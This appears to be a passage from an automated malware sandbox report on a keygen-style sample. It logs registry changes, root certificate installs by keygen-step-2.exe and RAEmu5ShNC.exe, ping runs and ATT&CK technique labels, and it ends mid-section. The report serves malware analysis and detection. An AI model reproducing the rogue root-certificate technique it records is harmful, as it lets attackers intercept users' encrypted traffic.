Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	app.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f6baeb888638d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 349aa0818638d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d50507838638d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "326024370"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000844e0db036c365649af0742469c32d768c38c00f2915828943cbc030b3c4a705b78349ce6943136795108d26948415e2639476bb97215ede7d4556b7c8767f3c230ebabbe1c4aa1b6f2d680b7f4feed135d5a62d4a7f697a63cc6de58f0177171e0d29bceae64623f766659ba1c245dee01ae1bc23ce3bf55a80a329b50565a7a4a1888bd7496c8d3edde614097f7713a8859578cbad82860b8101a3fa225c38edea1a38b18d003fbdb0e9124724d3ac4335c2f036be2bb959eff00ac1f855a10309a64f0a53b06f790117d1bf52d764794af4475da07e2b5fea11695c27f0114d1cac5b0d39653294ee06d804aa495341e4cf99c3f299637a9215a2554f497cc4445cae77e01e115e990808ddcaaf5bb82210ae5156bdb2ad07d2ca4a10cb8c22a29b7ef6e806b88120bd6e7254b32bfd2636ff606bac24eb690653460a182e6b548655faf1d9ad1da5ae1418e68cc93b0fa50aefd0bf85e0d855007eddc5a2ba7b9cc9a09b121ebb46a0a29a2178b445fdccfa0627b072e8741ab0872855279737f68b6287adb71d25cacd34a6888dea0f9396050f5f7ccb2c6b99b1b43e5d03c86ae60c37	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{1F31F2E2-76B6-4970-BD79-D6982986AC93}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{288C42FE-93B2-4E5D-9104-C5B2BCF09402}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 631f07828638d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e44846b68838d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}	svchost.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

keygen-step-2.exeRAEmu5ShNC.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	RAEmu5ShNC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	RAEmu5ShNC.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

5388 PING.EXE
5372 PING.EXE
5404 PING.EXE
6584 PING.EXE

pid	process
5388	PING.EXE
5372	PING.EXE
5404	PING.EXE
6584	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

